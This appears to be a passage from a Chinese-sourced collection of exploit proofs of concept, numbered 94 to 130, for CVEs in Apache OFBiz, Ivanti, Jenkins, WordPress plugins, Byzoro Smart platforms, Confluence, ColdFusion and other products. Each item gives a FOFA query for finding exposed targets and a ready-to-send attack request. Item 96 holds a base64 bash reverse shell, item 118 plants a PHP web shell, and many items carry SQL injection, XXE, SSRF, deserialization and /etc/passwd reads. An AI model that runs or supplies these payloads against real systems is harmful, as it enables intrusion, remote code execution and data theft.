GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of an XML document; the XML is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /w|p-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Byzoro (北京百绰智能) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA: title="Smart管理平台"

POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

Uploaded file path: boot/web/upload/weblogo/1.php

122. Byzoro (北京百绰智能) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA: title="Smart管理平台"
The sql parameter value c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()

GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA: app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"

POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA: body="/Content/Theme/Standard/webSite/login.css"

POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file URL: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA: icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed from there.

126. aiohttp path traversal
FOFA: title=="ComfyUI"

GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA: body="Services/Identification/login.ashx"

POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA: app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA: app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"

Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA: icon_hash="-334624619"

POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
